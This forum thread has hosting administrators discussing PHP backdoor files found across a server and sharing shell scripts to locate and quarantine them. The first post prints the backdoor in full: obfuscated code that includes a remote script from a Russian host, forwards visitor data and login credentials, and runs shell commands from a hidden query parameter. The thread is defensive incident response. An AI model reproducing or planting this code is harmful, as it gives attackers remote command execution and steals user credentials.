  1. #1
    Join Date
    Aug 2004
    Location
    Virginia Beach, VA
    Posts
    13

    New Vulnerabilities - Scary PHP Files ALL Over the Server

    Not sure if any of you may have fallen to the same issues yet, but I'd recommend you do a "locate" or find of some files...here are some examples:

    options.php
    layout.php
    configs.php
    base.php
    time.php
    date.php
    tests.php
    fsav.php

    There's plenty more out there. These files all contain some dirty code...here's an example:

    Code:
    <?php
    error_reporting(0);
    if(isset($_POST["l"]) and isset($_POST["p"])){
        if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
        else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
    }else{$user_auth="";}
    if(!isset($_POST["log_flg"])){$log_flg="&log";}
    if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
    {
        if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
        if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
    }
    ?>
    Not sure exactly what this does, but...

    These files will INFEST your server. I have found them in almost EVERY user directory; meaning only safe_mode or suPHP could have stopped it. Cleaning them out is so difficult!

    I think this problem is related to Gallery. About 10 of my clients reported broken Gallery templates today and then this happened. However, Wordpress templates were also broken, and phpBBfm templates; they are broken on their own.

    It seems that the last two weeks have seen a HUGE jump in vulnerabilities...

    Anyone else seeing this? Any ideas? Please?

  2. #2
    Oh, and another thing...it also puts a .htaccess inside the directory with these phps that calls them on 404, which means you'll NEVER SEE IT in your apache logs.

  3. #3
    Here, I wrote this to try to find these files quickly...

    The only thing it doesn't account for is directories with spaces in the name...

    Code:
    updatedb
    for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties;
      do
        list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers"`
        for i in $list;
          do     
             thecount=`grep base64_encode $i | wc -l`
             if [ $thecount -ne 0 ]; then
               mv $i $i.hackers
             fi
         done
      done
    Don't forget to do the updatedb first...and you must run this as root.

    If there's a better solution, great...this is the quickest I could come up with.

  4. #4
    Looks like a gallery exploit. Upgrade your galleries to the latest secure versions. Check out secunia.com for known vulnerabilities. Btw, you may try something like this to find exactly what it does.
    <?php
    print (base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9"));
    ?>

  5. #5
    Yeah, I tried that, got back that it was contacting:

    http://bis.iframe.ru/master.php?r_addr=

    Unfortunately, a file_get_contents against it doesn't work. I think the server is down (or overloaded from the success of the hack?)

  6. #6
    Are you using mod_security?

  7. #7
    Yes, I have mod_security loaded with every option I could find on the net except the IP blacklists (too much performance loss).

  8. #8
    Oops! Problem in the code...here's a working version.

    Code:
    updatedb
    for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties;
      do
        list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers`
        for i in $list;
          do     
             thecount=`grep base64_encode $i | wc -l`
             if [ $thecount -ne 0 ]; then
               mv $i $i.hackers
             fi
         done
      done

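A find(1)-based version of the same scan, added here as an example and not the poster's script: it flags a file only when its basename is one of the names listed in the thread and its contents carry the base64_encode marker, it copes with directory names containing spaces (the limitation noted above), and it separates listing from renaming so hits can be reviewed first. The basename list, the marker and the .hackers quarantine suffix come from the thread; the sample tree it builds is constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not the original poster's script. Same idea (suspect basename
# plus the base64_encode marker), but done with find(1)/grep(1) so paths with
# spaces work, and split into list / count / quarantine steps.
# Assumed: the basenames named in the thread, the ".hackers" quarantine suffix.
SUSPECT_NAMES="time base date tests configs include guest report layout download remote create options messages package properties fsav"
MARKER="base64_encode"

# find_suspect_php ROOT: print every file under ROOT whose basename is in
# SUSPECT_NAMES and whose contents mention MARKER, one path per line.
find_suspect_php() {
    root=$1
    set --                       # build: -name time.php -o -name base.php ...
    for n in $SUSPECT_NAMES; do
        if [ $# -eq 0 ]; then set -- -name "$n.php"; else set -- "$@" -o -name "$n.php"; fi
    done
    find "$root" -type f \( "$@" \) -exec grep -l -- "$MARKER" {} +
}

# count_suspect_php ROOT: print the number of hits (handy for a cron report).
count_suspect_php() {
    find_suspect_php "$1" | wc -l | tr -d ' '
}

# quarantine_suspect_php ROOT: rename each hit to NAME.php.hackers, as the
# thread does; read -r keeps paths with spaces intact.
quarantine_suspect_php() {
    find_suspect_php "$1" | while IFS= read -r f; do
        mv -- "$f" "$f.hackers"
    done
}

# make_sample_tree DIR: constructed test tree (not real server content): one
# planted stand-in for the dropped file in a directory with a space in its name,
# one clean layout.php, and an index.php that has the marker but not a suspect name.
make_sample_tree() {
    mkdir -p "$1/user one/public_html" "$1/user2/gallery"
    printf '%s\n' '<?php error_reporting(0); @include_once(base64_decode("PLACEHOLDER") . "&url=" . base64_encode($_SERVER["SERVER_NAME"])); ?>' \
        > "$1/user one/public_html/options.php"
    printf '%s\n' '<?php $layout = "default"; ?>' > "$1/user2/gallery/layout.php"
    printf '%s\n' '<?php echo base64_encode("x"); ?>' > "$1/user2/gallery/index.php"
}

# Usage: sh scan.sh /home   (lists hits only; run quarantine_suspect_php yourself)
[ $# -eq 0 ] || find_suspect_php "$1"
```

Run the listing first and eyeball the hits; a legitimate options.php that happens to call base64_encode would be renamed just as readily as a dropped one.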